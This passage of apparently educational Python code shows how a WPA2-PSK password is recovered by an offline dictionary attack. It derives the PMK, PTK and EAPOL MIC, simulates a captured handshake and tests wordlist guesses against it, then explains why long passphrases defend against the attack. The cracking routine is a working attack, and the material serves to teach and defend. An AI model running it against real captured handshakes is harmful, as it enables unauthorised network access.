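def pmk_from_passphrase(passphrase, ssid):
    """PMK: 4096 rounds of PBKDF2-HMAC-SHA1, salted with the SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce, nbytes=48):
    """PTK from the PMK and the handshake values (48 bytes for CCMP, 64 for TKIP)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


def eapol_mic(kck, eapol_frame, version=2):
    """MIC over the EAPOL-Key frame with its MIC field zeroed. Key descriptor
    version 1 (TKIP) uses HMAC-MD5; version 2 (CCMP) HMAC-SHA1 cut to 16 bytes."""
    if version == 1:
        return hmac.new(kck, eapol_frame, hashlib.md5).digest()
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def eapol_msg2(snonce):
    """Constructed EAPOL-Key message 2 (STA -> AP) with the MIC field zeroed,
    which is exactly what the cracker hashes. Layout abbreviated for the demo."""
    return (b"\x01\x03\x00\x5f"                          # EAPOL v1, type Key, body length
            + b"\x02\x01\x0a\x00\x10"                    # descriptor RSN, key info, key length
            + bytes(8)                                   # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # SNonce, key IV, RSC, key ID
            + bytes(16)                                  # MIC field (zeroed)
            + b"\x00\x00")                               # key data length


def capture_handshake(passphrase):
    """What a sniffer sees: everything needed to check a passphrase guess."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    frame = eapol_msg2(SNONCE)
    return {"ssid": SSID, "ap": AP_MAC, "sta": STA_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": frame, "mic": eapol_mic(kck, frame)}


def crack_psk(hs, wordlist):
    """Try each candidate; the one whose KCK reproduces the captured MIC is the PSK."""
    for word in wordlist:
        pmk = pmk_from_passphrase(word, hs["ssid"])
        kck = derive_ptk(pmk, hs["ap"], hs["sta"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return word
    return None


if __name__ == "__main__":
    hs = capture_handshake("correct horse battery")       # constructed PSK
    print(crack_psk(hs, ["password", "letmein", "correct horse battery"]))
```

Nothing in the loop talks to the network: once the handshake is on disk the only cost per guess is the 4096-round PBKDF2, which is why the slide's countermeasure is a long, non-dictionary passphrase (or enterprise mode, where no passphrase exists to guess), and why the SSID acts as a per-network salt against precomputed tables.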